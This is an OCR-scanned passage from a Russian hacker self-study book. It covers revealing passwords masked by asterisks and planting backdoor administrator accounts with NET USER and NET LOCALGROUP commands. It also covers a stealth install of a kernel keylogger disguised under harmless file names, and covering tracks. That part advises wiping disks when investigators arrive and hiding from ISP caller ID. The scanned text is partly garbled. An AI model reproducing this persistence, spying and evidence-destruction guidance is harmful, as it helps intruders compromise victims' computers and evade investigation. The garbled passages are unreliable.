(Далее). На экране появится диалог, отображающий процесс взлома, послечего на экране отобразится полученный результат (Рис. 3.16).

Остальные инструменты OfficePassword 3.5 работают аналогичным образом, по-зволяя эффективно решать задачу доступа к различным документам, защищеннымпаролем. Единственная проблема — это время, требуемое для взлома. Если парольдостаточно длинен и сложен, то его взлом может потребовать неимоверно боль-ших ресурсов — а основной постулат криптографии гласит, что усилия на взломдокумента должны соответствовать его ценности.

Создатели программы рекомендуют начать восстановление с ав-томатического режима, и только в случае, когда после 24-28 часовработы пароль не будет взломан, переходить к режиму гаранти-рованного восстановления. Пользовательский режим восстанов-ления обязательно следует применить, если пароль содержитсимволы, не входящие в алфавит английского языка.

Поэтому перед тем, как запускать на всю катушку процедуру взлома, стоит по-пробовать еще одну возможность — выявления паролей, скрытых за строкойзвездочек.

Пароли зз строкой «******»

Все, кто когда-либо работал с приложениями, требующими ввода пароля длядоступа к определенным ресурсам, (например, при создании удаленного соеди-нения с сервером Интернета), должно быть знают, что очень часто в строке вво-да пароля отображается строчка звездочек типа «******». Иногда эти звездочкипросто закрывают отображение содержимого в поле, хотя сама информация, от-носящаяся к полю ввода, уже содержится в памяти компьютера. Это — недоста-ток программирования, поскольку имеются средства, позволяющие увидеть то,что скрыто за строкой звездочек. Таким образом, вместо длительного взломапаролей хакер получает их без всякого затруднения.

Хотя ценность таких инструментов ныне значительно уменьшилась, по-скольку разработчики программ не сидят сложа руки и научились скрыватьпароли по-настоящему, все же с помощью программ определения паролейза строкой звездочек можно достичь немалого успеха. Например, можнополучить такую интересную вещь, как пароль доступа к серверу троянаNetBus для последующего использования. На Рис. 3.17 представлен примерприменения с этой целью известной утилиты Revelation от компании Snad-Воу (http://www.snadboy.com) к строке пароля доступа к серверу NetBus вдиалоге настройки соединения клиента NetBus.

50

Page 53: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

•Л* SnadBoy’s Revelation ттт

007

‘Circled V CursorDrag to reveal password

| Check For Update) | About Exit

Text ol Window Under ‘Circled V Cursor (il available) I Copy to clipboard

StatusRevelation active.

Length of available text: 3

i SWORD-2000

iMycqл^

Change Hoct

«Host information-

Destination: |SWORD-200

Host name/IP: 1.0-0-1

TCP-port:

User name: |Administrator

Password:

Reposition Revelation out of the way when dragging ‘circled V П Always on top

When minimized, put in System Tray Д Hide ‘How to’ instructions

How to1) Left click and drag (while holding down the left mouse button) the ‘circled V

2) As you drag the ‘circled +’ cursor over different fields on various windows, the text in the fieldunder the cursor will be displayed in the Text of Window…’ box.

3) Release the left mouse button when you have revealed the text you desire.

NOTE — II the field contains text hidden by asterisks (or some other character), the actual text will beshown. In some cases the text may actually be asterisks.NOTE — Not an of the fields that the cursor passes over will have text that can be revealed. Checkthe status light foi availability of text.

Bright green — text available (See length of text:’ in Status area)Blight red — no text available

Cancel

Puc. 3.17. Пароль доступа к серверу NetBus хоста Sword-2000в нашем распоряжении!

Утилита Revelation действует следующим образом. Хакер перетаскивает мышьюизображение прицела из поля ‘Circled+’Cursor (‘Кружок+’Курсор) в диалогеSnadBoy’s Revelation на строку для ввода пароля (этот прицел на Рис. 3.17 ви-ден на поле Password (Пароль)). После этого в диалоге программы Revelation, встроке Test of Window Under Circles and Cursor (if available) (Проверка поляпод «кружком и курсором» (если доступно)) отображается пароль (если он тамимеется). Как видно из Рис. 3.17, мы восстановили пароль 007 и теперь получи-ли доступ к серверу NetBus хоста Sword-2000, который используется хозяиномвзломанного компьютера в его целях (а мы будем использовать в своих целях).Тем самым хакер избежал взлома доступа к средствам удаленного управления(серверу NetBus) трудоемкими методами [11].

Создание потайных ходовПосидев какое-то время за чужим компьютером, и кое-что успев, а кое-что и неуспев сделать, хакер должен уносить ноги, поскольку хозяин вот-вот вернется.Однако перед уходом ему требуется сделать две вещи: устранить следы своего пре-бывания на компьютере и обеспечить себе возможность повторного проникновения.

51

Page 54: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Первая задача настолько важна, что мы отвели ей целую Главу 4. Сейчас жесконцентрируемся на второй задаче — создании потайных ходов во взломанныйкомпьютер, позволяющих хакеру повторно навещать свою жертву, в том числеудаленно, решая свои проблемы за чужой счет и без всяких хлопот. Причем, од-нажды добравшись до компьютера, хакер должен сделать так, чтобы даже в слу-чае обнаружения одного из потайных ходов можно было немедленно создатьновый. На сленге такие ходы так и называют — «бэкдор», от английского слова«backdoor» — черный ход, и для его создания можно прибегнуть к ухищрениям,кратко описываемым в последующих разделах.

До£а&ле*ше учетных записейДобавив перед выходом из компьютера учетную запись с высокими привилегия-ми, хакер сможет в дальнейшем входит в систему, в том числе удаленно и, при не-обходимости, создавать себе новые потайные ходы. Такая процедура делаетсядвумя командами MS-DOS: NET USER <имя пользователя> <пароль> /ADD,создающей новую учетную запись с указанным именем и паролем, и NETLOCALGROUP <имя группы> <имя пользователя> /ADD, добавляющая соз-данную учетную запись в указанную локальную группу. На Рис. 3.18 представ-лен результат исполнения этих команд.

r^JCommand Prompt

— NewUser 00Г /add|The command completed successfully.

C:\>net localgroup fldministrators NewUspr /addI The command completed successfully.

Puc. 3.18. Создание потайного хода для пользователяNewUser прошло успешно

Теперь новоиспеченный пользователь NewUser может без проблем входить вкомпьютер, в том числе удаленно, и заниматься там своими делами без помех.А если создать несколько таких учетных записей, то по мере их выявления хакерможет создавать все новых и новых пользователей, делая попытки защититькомпьютер практически невыполнимыми.

52

Page 55: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

Автозагрузка утилит

Однако создание собственной учетной записи — дело опасное, поскольку сис-темный администратор имеет все возможности немедленно выявить свежеиспе-ченного пользователя компьютера. Тогда можно воспользоваться другой воз-можностью Windows — поместить в папку автозагрузки Startup внутри папкиDocument and Settings (Документы и настройки) файлов программ, автомати-чески загружающихся при входе в систему пользователя. Причем программы изпапки Startup, находящейся в папке All users, будут запускаться для всех поль-зователей системы.

Хакер устанавливает в папку автозагрузки свою программу, которую он можетназвать совершенно безобидным именем, под которым она и будет скрытно ис-полняться. В число хакерских утилит могут входить троянские кони, клавиатур-ные шпионы (кейлоггеры), утилиты удаленного управления. В этой главе мыопишем работу с очень популярным кейлоггером IKS (Invisible KeyLoggerStealth — Невидимый клавиатурный шпион), демо-версию которого можно загру-зить с сайта http://www.amecisco.com.

Клавиатурные шпионыКлавиатурные шпионы — это программы, регистрирующие нажатия клавиш накомпьютере. Принцип их действия прост — все нажатия на клавиши перехваты-ваются программой, и полученные данные записываются в отдельный файл, ко-торый далее может быть отослан по сети на компьютер взломщика.

Клавиатурный шпион IKS можно назвать весьма популярной программой — поутверждению авторов на сайте http://www.amecisco.com, кейлоггер InvisibleKeyLogger 97 вошел под номером 8 в список 10 изделий, которые способны «на-пугать вас до смерти». Текущая версия кейлоггера функционирует на системахWindows NT/2000/XP, внедряясь в ядро системы, что позволяет программе пере-

хватывать все нажатия клавиш, включая 1Г ‘ l+ir^n+l0″8″]. Поэтому IKS позво-

ляет даже перехватывать нажатия клавиш при входной регистрации в системеWindows NT/2000/XP. Таким образом, программа IKS действует подобно драй-веру клавиатуры, перехватывая все нажатые клавиши и записывая их в жур-нальный файл.

Установка программы IKS не вызывает трудностей. После запуска загруженного сWeb-сайта файла iks2k20d.exe отображается диалог, представленный на Рис. 3.19.

53

Page 56: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

D Standard Install | p Stealth Install | D Uninslall |

It’s recommended that you use Standard Install if this is your first time in using IKS. Justaccept the defaults and dick on «Install Now» button. Or you can dick on ‘Read readme M»to get familiar with the concept of IKS first.

During a standard installation a program directory will be created; program files will beplaced in the directory. An icon to the log file viewer will be placed on the desktop. No Tilerenaming (stealth features) will take place.

Install Directory

|C \Progrem Files\iks

You need to heva administrator rights on this system for it to install successfully.

rf you want to uninstall in the future, just run this program (iksinstall.exe) again, dick on the»Unmstall» tab, then «Uninstall Now» to automatically uninstall the standard installation.

Read readme.M

Рис. 3.19. Инсталляция кеилоггера IKS весьма проста

Щелчок на кнопке Install Now (Установить сейчас) устанавливает демо-версиюкейлоггера. Полная версия IKS допускает замену имен установочных файлов про-извольными именами для сокрытия работы программы. Единственным файлом,необходимым кейлоггеру IKS для работы, является файл iks.sys, который можетбыть переименован с целью сокрытия его от пользователей. Все нажатые пользо-вателем клавиши записываются в текстовый и двоичный файл, просматриваемыйс помощью программы dataview.exe, окно которой представлен на Рис. 3.20.

Settings • Help

0 Filter Out Arrow Keys

D Filter Out Ctrl and Alt Keys

П Rtter Out F1 to FT 2 Keys

О Filter Out All Other Function Keys

Ф Use Notepad

О Translate to Text Only

Gear La a

П Clear Binary Log Upon Exit

0 dear Text Log Upon Exit

Import Binary Log From:

Save Text Log To:

C:\DOCUME~1\ADMINI~1.000\LOCALS I Browse,

Puc. 3.20. Диалог управления регистрацией клавиши хранением журнальных фатов

54

Page 57: Самоучитель хакера подробное иилюстрированное руководство

Проникновение в систему

Щелчок на кнопке Go! (Вперед) открывает файл журнала, хранящий все нажа-тые клавиши. С помощью диалога на Рис. 3.20 можно настроить работу кейлог-гера так, что будут отфильтровываться все нажатые функциональные клавишина клавиатуре, а также очищаться содержимое журнала.

Как мы уже говорили, кейлоггер IKS функционирует как низкоуровневый драй-вер, что скрывает его присутствие в системе. Однако файл iks.sys этого кейлог-гера записывается в каталог KOpeHb_CHCTeMbi/system32/drivers, а в системномреестре появляется регистрационная запись (эта запись выделена в диалоге ре-дактора системного реестра Regedt32 на Рис. 3.21).

Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi яШипRegistry Edit Tree View Security Options Window Help

SGemuwaSGpc

&I37DRIVERCEJIASЙ ICQ Groupware £COIISADMINIPMkslCD ILDAP•QIMAP4D32•GDIMonitorЙ inetaccsC±llnetln(o

•Ш Inport

Start: REG_DWORD: 0x3Type: REG_DWORD: 0x1

Puc. 3.21. В системном реестре Windows появилась предательская запись

С помощью таких записей в системном реестре все установленные в системекейлоггеры идентифицируются без всяких проблем (например, это с успехомделает программа The Cleaner, особенно полезная для поиска троянских коней).Чтобы преодолеть такой недостаток кейлоггера IKS, на вкладке Stealth Install(Скрытая установка) инсталляционного диалога (Рис. 3.19) можно изменить имяустанавливаемого драйвера на какое-нибудь безобидное, типа calc.sys, чтобызапутать систему защиты (собственно, отсутствие этой возможности — основноеотличие демо-версии от полной).

Некоторым недостатком IKS является отсутствие поддержки средств передачинакопленных данных по сети. Этого недостатка лишен кейлоггер 007 StealthMonitor, который умеет отслеживать посещения пользователем Web-сайтов, вве-денные пароли, запущенные программы, время обращения к файлам и другиедействия пользователя. Однако эта программа плохо маскирует свою работу — еепроцесс виден в диспетчере задач Windows, хотя хакер может заменить названиепроцесса каким-то другим, например, notepad.exe.

55

Page 58: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

ЗаключениеОписанные в этой главе инструменты позволяют получить доступ к ресурсамкомпьютера, защищенного паролем BIOS, экранными заставками и средствамивходной регистрации. Для их использования хакер должен работать непосредст-венно на консоли атакуемой системы, что несколько снижает ценность предло-женных здесь технологий. В самом деле, опыт показывает, что при наличии фи-зического доступа к компьютеру хакер просто похищает его жесткий диск дляпоследующей «работы». Тем не менее, все описанные здесь средства — это от-нюдь не игрушки, и если система защиты компьютера плохо настроена, а по-литика безопасности организации, мягко говоря, слабовата (что весьма тради-ционно), то хакер, овладев описанными в главе методами, может достичь оченьи очень многого.

А для антихакера здесь наука — не будь ламером, защищай систему паролямидостаточной сложности, не бросай компьютер без всякой защиты на растерзаниетипам вроде доктора Добрянского и иже с ним. Одна только установка шаблонабезопасности для рабочей станции Windows 2000/XP вполне способна пресечьмногие и многие штучки подобного рода персонажей. Что касается пользовате-лей Windows 9x/Me, то их возможности по защите системы невелики — толькоприменение методов шифрования, наподобие предоставляемых пакетом PGPDesktop Security, может защитить их компьютер от полного разгрома. Сама жепо себе система защиты Windows 9x/Me весьма слаба, как мы могли только чтоубедиться.

Ну ладно, компьютер взломан, права доступа получены достаточные, информа-ция выкачана, потайные ходы установлена — что же дальше? Пора замести следыи вовремя смыться. Так что переходим к следующей главе.

56

Page 59: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 4 .

Сокрытие следовСокрытие следов — важнейший этап работы хакера, поскольку, выявив признакинесанкционированной деятельности хакера, антихакер сразу же предприметмеры защиты. Все это соответствует реальному миру, где преступники, присту-пая к «работе», надевают перчатки и маски, вешают фиктивные номера на авто-мобили, ну и так далее — все вы, наверное, хоть раз, да смотрели гангстерскиефильмы. Действуя в виртуальном мире, всякие разные «кул хацкеры», если онихоть чего-то стоят, также должны предусмотреть, причем со всем тщанием, спо-собы сокрытия следов своей деятельности.

Вообще говоря, тема сокрытия своей деятельности в виртуальном мире — весьмаактуальна и многогранна. В Главе 1 уже приводился тот печальный факт, что око-ло 50% всех попыток удаленного взлома компьютерных систем выполняется сдомашних компьютеров, подключенных к серверам Интернета через телефонныелинии — причем серверы Интернета, все как один, снабжены устройствами АОН.

Стоит ли тут удивляться многочисленным сообщениям о поимке «страшногопреступника», который, запустив хакерскую программу автоподбора паролейвходной регистрации на сервере провайдера Интернета, считает себя полностьюнеуязвимым. Причем такая уверенность основана на смехотворном, хотя и пси-хологически понятном факторе,- ведь хакер сидит в своей квартире за закры-той дверью, где его «никто не видит», в то время как программа подбирает от-мычки к входной двери чужого дома. Результаты такого «хакинга» иногда по-казывают в телевизионных новостях, под рубрикой «криминальная хроника»(что и неудивительно).

Так что автор настоятельно предлагает всем любителям обсуждаемого жанрасамым внимательным образом почитать эту главу, прежде чем решиться на ка-кие-либо действия (никак не поощряемые автором).

Автор в очередной раз предупреждает читателей об ответст-венности за все деяния в виртуальных просторах Интернета,которые могут быть выполнены с помощью описанных в этойкниге программ и методов. Учтите, что книга написана с един-ственной целью — научить вас противостоять хакерским нападе-ниям, что, безусловно, требует знания хакерских технологий.За прямое применение описанных в книге технологий и их послед-ствия автор ответственности не несет.

Page 60: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Дбз аспекта задачи сокрытия следовВообще говоря, каждый человек, работающий с компьютером, должен самымвнимательным образом отнестись к проблеме сохранения своей конфиденциаль-ности. Дело в том, что вся хранящаяся в вашем компьютере, домашнем или ра-бочем, информация — это отражение вашей деятельности в виртуальном миреИнтернета. И раскрытие этой информации приводит к нарушению того, что анг-личане называют privacy — конфиденциальность личной жизни. Работая на ком-пьютере, вы неизбежно оставляет за собой следы в виртуальном компьютерноммире, следы, которые, если не предпринять особых мер, запросто позволяютидентифицировать вашу личность в реальном, физическом пространстве, что невсегда полезно и очень часто приводит к неприятностям.

Что касается обычных пользователей, то им автор рекомендует почитать книгу [10],где красочно описаны случаи из жизни (правда, «за бугром») разного рода лич-ностей, которые по разным причинам — беспечности, неопытности и тому по-добным недостаткам — забыли о защите этой самой privacy. Такие люди, какправило, пребывают в полной уверенности, что виртуальный мир Интернета,или, как сейчас говорят, киберпространство — это нечто потустороннее, никак несвязанное с их жизнью в реальном мире. Но не о них сейчас речь.

Речь сейчас идет о том, как должен вести себя человек, который, путешествуя повиртуальному компьютерному миру, любит перелезать через всякие там разныешлагбаумы и заборы с табличкой «проход закрыт», и гулять по запретной тер-ритории киберпространства. Ясно, что при таких путешествиях следует придер-живаться особых правил личной безопасности и конфиденциальности. Эта за-дача имеет два аспекта.

Во-первых, это локальная безопасность. Следует иметь в виду, что все этиштучки в виртуальном компьютерном мире оставляют следы и в вашем ком-пьютере, что может стать источником больших проблем. Вы сами подчасможете увидеть на экранах телевизоров, как вслед за очередным, пойманным погорячим следам, «кул хацкером» несут системный блок его компьютера — ясно,что не на продажу.

Во-вторых, это глобальная безопасность. При прогулках в киберпространствехакеру следует оставлять как можно меньше следов хотя бы на закрытых дляпостороннего входа территориях. Следует ясно понимать, что любые ваши дей-ствия в Интернете отслеживаются Web-серверами и фиксируются в журнальныхфайлах как сервера провайдера Интернета, так и посещенных вами Web-серверов, и выявить по этим записям ваше местоположение в реальном мире -сущие пустяки.

Так что есть смысл рассмотреть, где могут скрываться источники угроз для лич-ностей, занимающихся всякими штучками и проделками в киберпространстве,

58

Page 61: Самоучитель хакера подробное иилюстрированное руководство

Сокрытие следов

затрагивающими интересы других людей (кстати, эти сведения не будут лиш-ними и для всех прочих пользователей компьютеров).

Локальная безопасностьИтак, предположим, что вы с помощью своего верного друга-компьютера натво-рили делишек, за что и пострадали, и теперь ваш системный блок — в руках раз-ного рода следопытов. Ну и что же они там могут такого увидеть, в этом вашемсистемном блоке? Да почти все, что надо, чтобы сделать вашу участь просто при-скорбной на ближайшие несколько лет. На винчестере компьютера можно найти:

• Наборы хакерских программ, которые вы использовали для своей деятельности.

• Историю путешествий в Интернете, рассказанную вашим Web-браузером.

• Вашу переписку по электронной почте, в том числе давным-давно удаленнуюиз почтовых ящиков.

• Различные файлы данных, которые вы извлекли из чужих компьютеров безспроса у хозяев.

• Множество документов в корзине Windows, которые вы удалили программойПроводник (Explorer) и решили, что все концы спрятаны в воду.

• Информацию о недавно открытых документах, хранимая в файле подкачкиWindows.

• Информацию в файле резервной копии системы, а также в файлах резервныхкопий документов MS Office.

Так что ваш компьютер, по сути, преподносит всем, кому угодно на блюдечке сголубой каемочкой всю информацию о вас и вашей деятельности. Откуда жепоступает эта информация? Давайте вначале рассмотрим каналы утечки конфи-денциальной информации, предваряя обсуждение мер по их перекрытию.

Гибкие и жесткие диски

Одним из каналов утечки информации о вашей деятельности на компьютере яв-ляются гибкие и жесткие диски. Суть дела в том, что гибкие и жесткие дискихранят гораздо больше данных, чем это можно увидеть в окне программы Про-водник (Explorer) при их просмотре, о чем очень часто забывают владельцы дис-ков. Следует твердо помнить, что удаление файлов на диске командой Удалить(Delete) проводника Windows ничего, фактически, не удаляет. Все такие файлыпопадают в корзину Windows и, кроме того, на дисках могут остаться их времен-ные копии, создаваемые, например, приложениями MS Office. Чтобы увидеть этовоочию, включите режим отображения скрытых файлов, установив переключа-тель Показывать скрытые папки и файлы (Show hidden files and folders) в

59

Page 62: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

диалоге Свойства папки (Folder Options) проводника Windows. Этот диалог от-крывается командой Сервис * Свойства папки (Tools * Folder Options) (Рис. 4.1).

)0бщие j Вид | Типы файлов | Автономные файлы j I

(мА Можно отображать все папки е одинаковом виде.

| Как у текущей папки | | Сброс для всех папок

Ьпогните льные параметры:И Отображать папку «Мои документы» но рабочем столе Г;D Отображать сжатые файлы и папки другим цветом0 Помнить параметры отображения каждой папки0 Скрывать защищенные системные файлы (рекомендуется)Q Скрывать расширения для зарегистрированных типов файлов ГШ Скрытые файлы и палки

Q Ыпровление парами веб-страниц и попок© Показывать и обрабатывать пару как единый файлО Показывать обе части и обрабатывать их отдельноО Показывать обе части, но обрабатывать их клк единый фай/ «

< 1 М-

| Восстановить умолчания

OK I Отмена 1 I Применить

Рис. 4.1. Установка режима отображения скрытых файлов

После выполнения такой операции удалите какой-либо файл приложения Wordкомандой Удалить (Delete) проводника Windows и посмотрите, что осталось всодержащей его папке. Пример представлен на Рис. 4.2, на котором отображенапапка со следами, оставшимися при подготовке секретного документа Word,файл которого в процессе подготовки много раз модифицировался, сохранялся,восстанавливался после зависания приложения и так далее.

Файл Правка Вид Избранное Сервис Справка

И Рабочий стол^ Результаты поиска

1 ^3 Мои документы

I-QPGPg СЗ SecurityI ; О DatabaseLSJ Мои рисунки

IЩ Мой компьютерrf Диск 3.5 (А:)& Локальный диск (С:)Э Локальный диск (D:)

Объектов: 10 (Свободно но Др50 КБ |и| Мой компьютер

3PGPI] Security5|Мои рисунки

б50~$Секретный документ.doc|~WRL0002.tmp

_~WRU>004.tmp•|~WRL1120.tmp

~WRL19B2.tmp|~WRL3531.tmp

Puc. 4.2. Папка со скрытыми файлами,оставшимися после удаления основного файла документа

Как видим, после удаления файла в папке осталось несколько его копий — вре-менные файлы .ТМР, резервные копии .WBK, оставшийся после зависания ком-

60

Page 63: Самоучитель хакера подробное иилюстрированное руководство

Сокрытие следов

пьютера файл, начинающийся с символов ~$. Более того, если все эти файлытакже удалить, в том числе, и из корзины Windows, фрагменты информации,содержащиеся в документе, все равно останутся в файле подкачки системыWindows. Вам, наверное стало ясно — что ничего вы, в сущности, не удалили -все ваши делишки налицо. Что же теперь делать?

Для надежного удаления всей информации, относящейся к файлу доку-мента MS Office, следует применять специальные утилиты очистки дисков,предоставляемые многими приложениями, например, Norton Utilities. Мыже рассмотрим сейчас более эффективное средство очистки дисков от вся-кого компрометирующего мусора — программу Cleaner Disk Security(http://www.theabsolute.net/sware/index.htmlttClndisk).

Очистка файлов и папокЧтобы стереть файл так, чтобы его не смогла прочитать программа восстановленияфайлов, следует физически перезаписать все биты файла, хранящиеся на диске. Од-нако это не так просто, как может показаться на первый взгляд. Для надежной очи-стки носитель секретной информации должен перезаписываться многократно, сиспользованием шаблонных байтов информации, генерируемых случайным обра-зом. Число итераций зависит от важности информации и типа ее носителя — стан-дарт министерства обороны США, например, требует трехкратной перезаписи.Только это может гарантировать вы-сокую (но не 100%) степень очистки.

На Рис. 4.3 представлен диалог ути-литы Clean Disk Security 5.01(http://www.the-absolute.net/sware/index.html#Clndisk), которая удов-летворяет основным требованиям,предъявляемым к средствам очисткиносителей секретной информации(и даже несколько их усиливает).

Утилита Clean Disk Security 5.01позволяет стирать отдельные фай-лы и папки на дисках с помощьюкоманды контекстного меню Erasefully (Полное стирание). Утилитаобеспечивает полное стирание -уничтожается как сама информацияв файлах, так и все ее следы, ос-тавшиеся в различных буферах итаблице размещения файловой сис-темы (поддерживаются файловые

Рис. 4.3. Утилита Clean Disk Security 5.01выполняет очистку дисков

четырьмя методами

61

Page 64: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

системы FAT и NTFS). Также стирается информация, содержащаяся в свобод-ных областях кластеров файловой системы, используемых стираемым файлом.Утилита позволяет очищать файл подкачки Windows, корзину Windows, папкуTemp с временными файлами (в которую, например, загружаются распаковы-ваемые инсталляционные файлы) и очищать списки последних использованныхфайлов. При желании пользователь может очистить кэш-память, используемуюбраузерами Интернета для хранения загруженных файлов, списки, хранящиепредысторию работы в Интернете и файлы куки (cookie). Все эти возможностиустанавливаются с помощью флажков, представленных в главном диалоге ути-литы (Рис. 4.3).

Как видно на Рис. 4.3, утилита предоставляет четыре метода очистки:

• Simple (Простой) — допускает выполнение до 6 проходов, во время которыхна диск записываются случайно генерируемые символы. Этот метод приго-ден для большинства случаев; обычно бывает достаточно 1 прохода.

• NIS — поддерживает до 7 проходов с записью случайно генерируемых сим-волов (т.е. наборов бит определенной длины) и их преобразований.

• Gutmann — поддерживает до 35 проходов с записью случайно генерируемыхшаблонов (т.е. последовательностей случайно генерируемых бит). Этот методпредложен Питером Гутманом (Peter Gutmann) из департамента компьютер-ных наук университета г. Окленд. Полная очистка этим методом занимает мно-го времени, но зато обеспечивает защиту от сканирования диска высокоточнымоборудованием (есть и такое).

• Test mode (Тестовый режим) — выполняет за один проход запись символа #10кода ASCII.

Все эти возможности впечатляют. Очевидно, что утилита Clean Disk Security 5.01представляет собой профессиональный инструмент для стирания информациии, к тому же, снабженный удобным интерфейсом и исчерпывающей справоч-ной системой.

Вот вам совет, почерпнутый из [10]. Чтобы по-настоящему надежно прикрытьсяот всяких следопытов, сделайте следующее: купите себе источник бесперебой-ного питания (UPS); подготовьте надежную утилиту полной очистки жесткогодиска компьютера. Далее, как только к вам придут нежданные гости, запуститеутилиту очистки и дождитесь завершения ее работы. Источник бесперебойногопитания поможет вам довести операцию до конца, если ваши гости выключатэлектропитание в вашей квартире.

62

Page 65: Самоучитель хакера подробное иилюстрированное руководство

Сокрытие следов

Очистка системного реестра

Наконец, упомянем угрозу, исходящую от системного реестра. В нем хранитсяочень и очень много всего такого, что выдаст вас с головой, стоит только тампокопаться квалифицированному специалисту. Вообще-то, именно по этой при-чине системный реестр пользуется повышенным вниманием хакера, но в данномслучае мы имеем в виду внимание людей, интересующихся самими хакерами.Так что не стоит пренебрегать его очисткой от порочащих вас данных, хотя сде-лать это достаточно сложно. Дело в том, что автоматизированные утилиты очи-стки реестра, к примеру, Norton Utilities, обеспечивают удаление только ненуж-ных записей, оставшихся после установки/удаления программ, создания и уда-ления ярлыков и так далее. Избирательно очищать реестр от конфиденциальныхданных они не умеют, и все это следует делать руками, в лучшем случае с по-мощью самодельных сценариев [10].

Так что лучший выход (исключая полную очистку системы) — это закрытие дос-тупа к реестру для всех, кроме администратора системы, что можно сделатьсредствами редактора реестра regedt32. Далее следует рассмотреть вопрос обиспользовании криптографических средств для защиты хакерской системы отнежелательного просмотра любителями чужих секретов. Например, можно при-бегнуть к средствам шифрования файлов и папок, предоставляемым файловойсистемой NTFS.

Глобальная безопасностьВ начале главы уже отмечалось, что главная опасность, которая подстерегаетхакера, проводящего различные акции в Интернете — это ложное ощущениесвоей анонимности и неуязвимости. Следует твердо помнить, что все — абсо-лютно все — действия в Интернете отслеживаются Web-серверами и фиксиру-ются в специальных журналах. Далее эти сведения могут быть предоставленыкому угодно, в том числе и людям, потерпевшим от ваших действий. Поэтомупри работе в Интернете следует соблюдать особую осторожность. Обсудимсамые опасные ситуации, подстерегающие пользователя, подсоединившегося кИнтернету.

ТТро&айдерыПри подключении к Интернету, прежде всего, следует позаботиться об аноним-ности подключения к серверу провайдера Интернета. Так что при выборе про-вайдера Интернета прежде всего постарайтесь избежать авторизованного досту-па к Интернету и вместо заключения договора отдайте предпочтение покупкекарточки Интернета. Такие карточки ныне общедоступны, и при их покупке высохраняете свою анонимность.

63

Page 66: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Однако анонимность покупки карточки вовсе не означает вашей анонимностипри работе в Интернете, что напрямую связано с конфиденциальностью и безо-пасностью вашей информации. В настоящее время провайдеры Интернета уста-навливают на входных телефонных линиях своего сервера устройства автомати-ческого определения номера (АОН). При подключении к серверу провайдераИнтернета местная АТС, в ответ на запрос сервера, отсылает ему телефонныйномер входящего звонка, и сервер записывает этот номер в журнал вместе с ва-шей учетной записью. В процессе работы в Интернете сервер провайдера будетавтоматически фиксировать все ваши действия (адреса посещенных Web-узлов,использованные протоколы, возможно, фрагменты трафика), ассоциируя их свашей учетной записью, хранящей, в том числе, выявленный устройством АОНномер вашего телефона. Так что, в случае необходимости, найти вас не пред-ставляет никакого труда.

Для борьбы с этим злом предлагается множество методов (см., к примеру [5],[10], или выпуски журнала «Хакер» — автор бессилен передать все многообразиеметодов и уловок, которые можно встретить на страницах этого, в высшей сте-пени полезного источника). Скажем, предлагается устанавливать на своем ком-пьютере устройство анти-АОН, которое призвано блокировать передачу станциейАТС вашего телефонного номера серверу провайдера Интернета. Однако на-дежность защиты, обеспечиваемой этими устройствами, никем толком не прове-рена, поскольку все они разработаны и изготовлены радиолюбителями. Так чтовряд ли стоит полагаться на эффективность таких устройств, как анти-АОН.

Если уж вы решитесь на использование анти-АОН, программных или аппарат-ных, для начала проверьте их эффективность. Многие провайдеры Интернетапредоставляют своим пользователям статистику подключений по пользователь-ской учетной записи. Это делается для контроля пользователями расходов бюд-жета, выявления нелегальных подключений и так далее. Так вот, в этой стати-стике приводятся телефоны, с которых выполнялись подключения, выявленныеустройствами АОН провайдера. Так что включите свой анти-АОН, выполнитенесколько подключений к Интернету и проверьте — что из этого получилось,прежде чем пускаться во все тяжкие!

Общая рекомендация такова — если вы хотите сделать в Интернете нечто, тре-бующее полной конфиденциальности, никогда и ни при каких обстоятельствахне используйте телефон, номер которого позволит выявить вашу личность. И ужво всяком случае, НИКОГДА НЕ ИСПОЛЬЗУЙТЕ ДОМАШНИЙ ТЕЛЕФОН -ЭТО АБСОЛЮТНО, БЕЗУСЛОВНО И СОВЕРШЕННО НЕДОПУСТИМО!!!

АнонимайзерыПри запросе страницы Web-сайта компьютеру приходится обмениваться с сер-вером определенной информацией, и этот процесс не ограничивается передачей

64

Page 67: Самоучитель хакера подробное иилюстрированное руководство

Сокрытие следов

.вам для просмотра HTML-кода запрошенной Web-страницы. В процессе обменасервер может получить с компьютера Web-путешественника и другую инфор-мацию, в том числе идентифицирующую тип компьютера, предыдущий посе-щенный вами Web-сайт, идентифицирующие вас адреса электронной почты итому подобное.

Чтобы более четко уяснить возможности по вашей идентификации, имеющиесяу серверов Интернета, можно обратиться к Web-сайту по адресуhttp://www.privacy.net/analyze, который предоставляет услуги по анализу ин-формации, которую может извлечь Web-сервер из клиентского компьютера.Как видно из Рис. 4.4, этот сервер Интернета без проблем определил операцион-ную систему клиентского компьютера, используемый Web-браузер, время за-проса и ГР-адрес сервера провайдера Интернета.

3l Analyze Your Internet Privacy — Microsoft Internet Explorer^ ^ » ^ ^ ~ •BBSBBBgg

Файл Правка Вид Избранное Сервис Справка

**- Назад ^ аПереход

Your Browser Type and Operating System:

Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)

All Information sent by your web browser when requesting this web page:

Accept: */* Accept-Language: ru Connection; keep-alive Host: www.privacy.net User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:Date=1/30/2002; Privacy. net=Privacy+Analysis Via: 1.1 cea15. 1.1proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3) X-Forwarded-For: 212.9.232.151,212.9.224.89 Cache-Control: max-age=259200

a_ Интернет

Рис. 4.4. Фрагмент Web-страницы с результатом анализа конфиденциальности

Более того, на этой же странице чуть ниже (здесь это не видно) представленырезультаты запроса одного из серверов Whols, о которых мы рассказывали вГлаве 1, содержащие регистрационные сведения о домене провайдера Интернетавместе с телефонами администраторов сети.

